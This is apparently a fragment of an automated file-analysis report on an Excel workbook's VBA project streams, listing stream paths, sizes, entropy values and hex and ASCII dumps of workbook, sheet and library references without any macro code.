Data Raw:	49 44 3d 22 7b 45 44 36 37 30 39 39 32 2d 30 30 30 41 2d 34 35 34 38 2d 38 39 41 34 2d 35 39 43 33 45 43 44 32 35 43 46 45 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30

General
Stream Path:	_VBA_PROJECT_CUR/PROJECTwm
CLSID:
File Type:	data
Stream Size:	104
Entropy:	3.0488640812019017
Base64 Encoded:	False
Data ASCII:	T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
Data Raw:	54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00

General
Stream Path:	_VBA_PROJECT_CUR/VBA/_VBA_PROJECT
CLSID:
File Type:	data
Stream Size:	2644
Entropy:	4.0019514032400325
Base64 Encoded:	False
Data ASCII:	a . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 0 . # . 9 . # . C . : . \\ . P . R . O . G . R . A . ~ . 2 . \\ . C . O . M . M . O . N . ~ . 1 . \\ . M . I . C . R . O . S . ~ . 1 . \\ . V . B . A . \\ . V . B . A . 6 . \\ . V . B . E . 6 . . . D . L . L . # . V . i . s . u . a . l . . B . a . s . i . c . . F . o . r .
Data Raw:	cc 61 88 00 00 01 00 ff 09 40 00 00 09 04 00 00 e4 04 01 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 fa 00 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 30 00 23 00